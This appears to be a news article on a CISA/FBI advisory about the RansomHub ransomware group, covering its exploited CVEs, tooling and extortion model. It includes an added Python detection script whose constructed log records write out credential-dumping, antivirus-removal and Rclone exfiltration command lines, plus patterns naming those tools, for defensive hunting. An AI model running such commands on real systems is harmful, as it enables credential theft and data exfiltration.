A new advisory by CISA and the FBI warned of recent attacks by RansomHub and said that the group and its affiliates have successfully hit over 210 victims since its inception in February.
In the advisory, which shared several of the group's tactics and known Indicators of Compromise (IoCs), the U.S. government said that RansomHub attacks have hit entities across many industries, including healthcare, water and wastewater, IT, government services, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation and communications. These attacks have been observed as recently as this month, said CISA.
“RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV),” according to CISA and the FBI in their Thursday advisory.
RansomHub's affiliate model means that tactics and techniques vary from attack to attack. Affiliates use several different initial access methods, including phishing and password spraying, and have also exploited known vulnerabilities, including ones in Citrix ADC (CVE-2023-3519), Fortinet FortiOS (CVE-2023-27997), Apache ActiveMQ's OpenWire protocol (CVE-2023-46604), Atlassian Confluence (CVE-2023-22515), Microsoft Windows SMBv1 (CVE-2017-0144) and more.
The U.S. government also observed a variety of other tactics, including the use of Windows Management Instrumentation (WMI) to disable antivirus products and, in some cases, tools linked to RansomHub such as EDRKillShifter to disable endpoint detection and response (EDR) software. Affiliates have also used tools such as Mimikatz to harvest credentials, along with Cobalt Strike, Metasploit and more.
The affiliates use a double-extortion model, both encrypting systems and exfiltrating data to pressure victims into paying. The ransom note dropped during encryption typically does not include an initial ransom demand or payment instructions. Instead, the victim is given a client ID and instructed to contact the group through a unique .onion URL, and then given between three and 90 days to pay a ransom.
“Data exfiltration methods depend heavily on the affiliate conducting the network compromise,” said the advisory. “The ransomware binary does not normally include any mechanism for data exfiltration. Data exfiltration has been observed through the usage of tools such as PuTTY, Amazon AWS S3 buckets/tools, HTTP POST requests, WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.”
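The tooling named above is what a defender can actually hunt for. As an added illustration (not code from the advisory or from this article), the sketch below runs simple detection logic over constructed Sysmon-style process-creation records and tags the behaviours the advisory describes: Mimikatz credential dumping, WMI-driven antivirus removal, and exfiltration with Rclone, WinSCP or PuTTY. The tool and Mimikatz module names are public; the specific `wmic ... call uninstall` invocation and the renamed-Rclone command-line heuristic are assumptions made for the example, and the log records are constructed.

```python
"""Hunt for tooling named in the CISA/FBI RansomHub advisory in process-creation logs.

Added example: the event records below are constructed, Sysmon-style dicts, not real
telemetry. Image-name matching is weak on its own because affiliates rename binaries,
so command-line patterns are checked as well.
"""
import re

# Binaries the advisory names for exfiltration and credential theft.
EXFIL_TOOLS = {"rclone.exe", "winscp.exe", "putty.exe", "pscp.exe", "psftp.exe"}
CRED_TOOLS = {"mimikatz.exe"}

# Mimikatz module names survive renaming of the executable.
MIMIKATZ_CMD = re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)

# Rclone syntax: <verb> <source> <remote>:<path>. A remote name of 2+ chars before the
# colon avoids matching plain drive letters such as "D:\backup" (heuristic, assumption).
RCLONE_CMD = re.compile(r"\b(copy|sync|move|copyto)\s+\S+\s+[A-Za-z0-9_.-]{2,}:", re.I)

# WMI-based product removal. The advisory only says WMI was used to disable antivirus;
# the wmic "product ... call uninstall" form is an assumed concrete instance.
WMI_UNINSTALL = re.compile(r"\bwmic\b.*\bproduct\b.*\bcall\s+uninstall\b", re.I)
AV_KEYWORDS = re.compile(r"antivirus|defender|endpoint|security", re.I)


def classify(event: dict) -> list:
    """Return the detection tags that fire for one process-creation record."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    tags = []
    if image in CRED_TOOLS or MIMIKATZ_CMD.search(cmd):
        tags.append("credential_dumping")
    if image in EXFIL_TOOLS:
        tags.append("exfil_tool")
    elif RCLONE_CMD.search(cmd):
        tags.append("exfil_tool_renamed")  # rclone-shaped command under another name
    if WMI_UNINSTALL.search(cmd) and AV_KEYWORDS.search(cmd):
        tags.append("wmi_av_removal")
    return tags


def scan(events: list) -> dict:
    """Map each record id that produced at least one tag to its tags."""
    findings = {}
    for event in events:
        tags = classify(event)
        if tags:
            findings[event["RecordId"]] = tags
    return findings


# Constructed sample records (Sysmon Event ID 1 shape, heavily trimmed).
EVENTS = [
    {"RecordId": 101, "Image": r"C:\Windows\System32\wmic.exe",
     "CommandLine": "wmic product where \"name like '%Antivirus%'\" call uninstall /nointeractive"},
    {"RecordId": 102, "Image": r"C:\Users\Public\mimikatz.exe",
     "CommandLine": "mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"RecordId": 103, "Image": r"C:\ProgramData\svchost.exe",  # renamed rclone
     "CommandLine": r"svchost.exe copy C:\Finance remote:exfil --config C:\ProgramData\r.conf -P"},
    {"RecordId": 104, "Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "CommandLine": "WinSCP.exe /console /script=up.txt"},
    {"RecordId": 105, "Image": r"C:\Windows\System32\cmd.exe",  # benign local copy
     "CommandLine": r"cmd.exe /c copy C:\report.docx D:\backup\ "},
    {"RecordId": 106, "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for record_id, tags in scan(EVENTS).items():
        print(record_id, ", ".join(tags))
```

Record 105 is included deliberately: a local `copy` to a drive letter must not fire the Rclone heuristic, which is the kind of false positive that makes a rule get switched off. In production the same logic would run against real Sysmon or EDR process telemetry rather than the embedded list.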
The ransomware group, though only six months old, has already claimed to have targeted several high-profile victims. RansomHub in April claimed to be selling sensitive data stolen from Change Healthcare, after the healthcare giant was hit by the BlackCat ransomware group in February.
CISA and the FBI urged network defenders to take a number of steps to mitigate RansomHub attacks, such as installing updates as soon as they are released, enabling MFA and training employees to recognize and report phishing attempts.